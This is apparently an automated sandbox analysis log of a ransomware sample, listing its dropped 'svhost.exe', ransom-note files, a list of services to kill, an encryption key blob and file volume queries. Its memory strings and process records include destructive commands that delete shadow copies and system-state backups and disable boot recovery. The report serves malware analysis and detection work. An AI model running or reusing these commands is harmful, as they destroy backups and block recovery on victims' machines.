Source: Binary string: bootmgr.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bootmgr.pdbM | source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\B\127930\Acrobat\Installers\Install_MaintenanceWizard\CustomActions\IWActs\Release\IWActs.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARM.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000323B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AbcpyDll.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ADelRCP.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bootmgfw.pdbO | source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003243000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\B\127930\Acrobat\Installers\InstEntryPointBlock\Release\InstEntryPointBlock.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: PerfInst.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcroTgts.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: 98j0BL6iLT.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 98j0BL6iLT.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 98j0BL6iLT.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 98j0BL6iLT.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 98j0BL6iLT.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E8A331 push ecx; ret 1_2_00E8A344
                        Source: 98j0BL6iLT.exeBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: 98j0BL6iLT.exeBinary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures.onelockNSIONwbadmin DELETE SYSTEMSTATEBACKUPwbadmin DELETE SYSTEMSTATEBACKUP -deleteOldestwmic.exe SHADOWCOPY /nointeractive[LOCKER] Run scanning...
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Users\user\AppData\Roaming\svhost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\how_to_back_files.html
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\how_to_back_files.html
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\how_to_back_files.html
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\how_to_back_files.html
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | API coverage: 5.9 %
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,task,task,1_2_00E6D910
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File Volume queried: C:\ FullSizeInformation
                        Source: 98j0BL6iLT.exe, 00000000.00000003.329283968.000000000323D000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.336032061.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.386685322.0000000003238000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.326523234.000000000323D000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.393424723.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.373531329.000000000465C000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.390600940.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.349555389.000000000465F000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.430682796.000000000323A000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.291506889.0000000003236000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V
                        Source: 98j0BL6iLT.exe | Binary or memory string: wrapper,DefWatch,ccEvtMgr,ccSetMgr,SavRoam,sqlservr,sqlagent,sqladhlp,Culserver,RTVscan,sqlbrowser,SQLADHLP,QBIDPService,Intuit.QuickBooks.FCS,QBCFMonitorService,sqlwriter,msmdsrv,tomcat6,zhudongfangyu,SQLADHLP,vmware-usbarbitator64,vmware-converter,dbsrv12,dbeng8
                        Source: 98j0BL6iLT.exe | Binary or memory string: $BgIAAACkAABSU0ExAAgAAAEAAQCV9LvY1+a2rVQQKmHIYxXwltivcgEVoGHGSlKiHlpscysu4TFFZjGnMZGNZWTRb7nMG3dbHsF+AtpEqANZtrFEa7qB93oCcKf2tekVmX8LvN3iaucvPjMyGmt9pVa/t7B4lrASmVHYi0srzzdQ8TkIc26mzHrr++ZWx3RMQbz+6Elsifb2Z1fwTdpnQUJ4Otq5pxlzifT2tsB8jMTJv59N7owqCYivCq9bToZrfUdmnX+2shzyaAe6axPaVArV/j2/iRk83i2piMda86GD87AryP5fTYApA2cCP2hicRWHNCFBJW5hne5doonZ9y2gn509GMxYv9qAhB2x8a9i8p6XEncrypt file: ALLUSERSPROFILE\AppData.dll,.sys,.ini,.rdp,.encrypted,.exe,.network6,.datalock17,.datalock18,.datalock19,.datalock20,.LOCK1,.lockhyp,.LOCK1,.LOCK2,.LOCK3,.LOCK4,.LOCK5,.lockfiles1,.lockfiles2,.lockfiles3,.lockfiles4,.lockfiles5,.lockfiles6,.lockfiles7,.lockfiles8,.lockfiles9,.lockfiles10,.locklock1,.locklock2,.locklock3,.locklock4,.locklock5,.locklock6,.locklock7,.locklock8,.locklock9,.locklock10,.lockdata1,.lockdata2,.lockdata3,.lockdata4,.lockdata5,.lockdata6,.lockdata7,.lockdata8,.lockdata9,.lockdata10,.locks1,.locks2,.locks3,.locks4,.locks5,.lockies,.DLOCK,.DLOCK2,.DLOCK3,.DLOCK4,.DLOCK5,.DLOCK6,.DLOCK7,.DLOCK8,.DLOCK9,.DLOCK10,.locks6,.locks7,.locks8,.locks9,.locks10,.locks,.readlock,.nlock,.L81,.pllock,.lockis,.CNLOCK,.farlock1,.farlock2,.farlock3,.farlock4,.farlock8,.farlock9,.farlock10,.farlock11,.farlock12,.farlock13,.farlock14,.farlock16,.marlock1,.marlock2,.marlock3,.marlock4,.marlock5,.marlock6,.marlock13,.marlock14,.marlock15,.marlock17,.newnet,.farlock25,.farlock27,.farlock28,.farlock29,.newlock1,.newlock2,.newlock3,.newlock4,.newlock5,.mlock,.farlockm30,.farlock31,.farlock32,.marlock21,.marlock22,.marlock23,.marlock24,.marlock25,.farlock1,.newlock6,.newlock7,.newlock8,.newlock9,.lockzl,.lockfile,.far2,.locksss,.retlock,.lockcz,.lockpl,.far3,.far4,.newlockfiles,.far5,.far6,.lockds,.fileslock,.far7,.lockdoc,.far10,.far12,.far13,.far14,.far15,.far16,.far17,.far18,.far18,.far19,.far20,.far1,.lockfiles,.marlock1,.marlock2,.marlock3,.marlock4,.marlock5,.marlock6,.marlock7,.marlock8,.marlock9,.marlock10,.marlock01,.marlock02,.marlock03,.marlock04,.marlock05,.marlock06,.marlock07,.mlock10,.mlock11,.mlock12,.mlock13,.mlock14,.mlock15,.mlock16,.mlock17,.mlock18,.mlock19,.mlock20,.Read1,.Read2,.Read3,.Read4,.Read5,.Read6,.Read7,.Read8,.Read9,.netlock6,.netlock7,.netlock8,.netlock9,.netlock10,.netlock11,.netlock12,.netlock13,.netlock14,.netlock15,.allock8,.allock9,.piglock,.allock10,.allock01,..sickfile,.onelock,:\USERPROFILEPROGRAMFILES(x86).sql,.mdfPT_EXTENSIONS_FULLProgramData\AppDatawrapper,DefWatch,ccEvtMgr,ccSetMgr,SavRoam,sqlservr,sqlagent,sqladhlp,Culserver,RTVscan,sqlbrowser,SQLADHLP,QBIDPService,Intuit.QuickBooks.FCS,QBCFMonitorService,sqlwriter,msmdsrv,tomcat6,zhudongfangyu,SQLADHLP,vmware-usbarbitator64,vmware-converter,dbsrv12,dbeng8WINDIRSYSTEMDRIVE\Application DatawxServer.exe,wxServerView,sqlservr.exe,sqlmangr.exe,RAgui.exe,supervise.exe,Culture.exe,RTVscan.exe,Defwatch.exe,sqlbrowser.exe,winword.exe,QBW32.exe,QBDBMgr.exe,qbupdate.exe,QBCFMonitorService.exe,axlbridge.exe,QBIDPService.exe,httpd.exe,fdlauncher.exe,MsDtSrvr.exe,tomcat6.exe,java.exe,360se.
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00EA47A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EA47A7
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E6F13F GetProcessHeap,HeapFree,1_2_00E6F13F
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00EB28E5 mov eax, dword ptr fs:[00000030h] 1_2_00EB28E5
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00EA57A8 mov eax, dword ptr fs:[00000030h] 1_2_00EA57A8
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E89EDD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00E89EDD
                        Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00EA47A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EA47A7
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gHExitMaximize&Click to activateShell_TrayWndTrayNotifyWndp
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\bootTel.dat VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\BCD VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\Recovery\WindowsRE\boot.sdi VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\BCD.LOG VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\Recovery\WindowsRE\ReAgent.xml VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\bg-BG\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\RdrManifest3.msi VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\Recovery\WindowsRE\Winre.wim VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\bg-BG\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\boot.stl VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\bootmgfw.efi VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\bootmgr.efi VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\cs-CZ\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\cs-CZ\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\cs-CZ\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\da-DK\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\da-DK\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\da-DK\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\de-DE\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\de-DE\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\de-DE\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\el-GR\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\el-GR\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\el-GR\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\en-GB\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\System Volume Information\tracking.log VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\en-GB\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\en-US\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\en-US\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\en-US\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\es-ES\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\es-ES\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\es-ES\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\es-MX\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\es-MX\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\et-EE\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\et-EE\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\fi-FI\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\fi-FI\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\fi-FI\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\fr-CA\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\Users\Public\Desktop\Acrobat Reader DC.lnk VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\fr-CA\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\Users\Public\Desktop\Google Chrome.lnk VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\fr-FR\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\fr-FR\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\fr-FR\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\MF\Active.GRL VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\hr-HR\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\MF\Pending.GRL VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\hr-HR\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\hu-HU\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\hu-HU\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\hu-HU\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\it-IT\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\it-IT\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\OFFICE\AssetLibrary.ico VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\it-IT\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\OFFICE\MySharePoints.ico VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ja-JP\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ja-JP\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\OFFICE\MySite.ico VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ja-JP\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ko-KR\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ko-KR\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\ko-KR\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\lt-LT\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\lt-LT\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\lv-LV\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\lv-LV\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\memtest.efi VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\nb-NO\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\nb-NO\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\nb-NO\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\nl-NL\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\nl-NL\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\nl-NL\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pl-PL\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pl-PL\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\wfp\wfpdiag.etl VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pl-PL\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pt-BR\bootmgfw.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft Help\MS.EXCEL.16.1033.hxn VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pt-BR\bootmgr.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft Help\MS.GRAPH.16.1033.hxn VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pt-BR\memtest.efi.mui VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\ProgramData\Microsoft Help\MS.GROOVE.16.1033.hxn VolumeInformation
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Queries volume information: C:\EFI\Microsoft\Boot\pt-PT\bootmgfw.efi.mui VolumeInformation
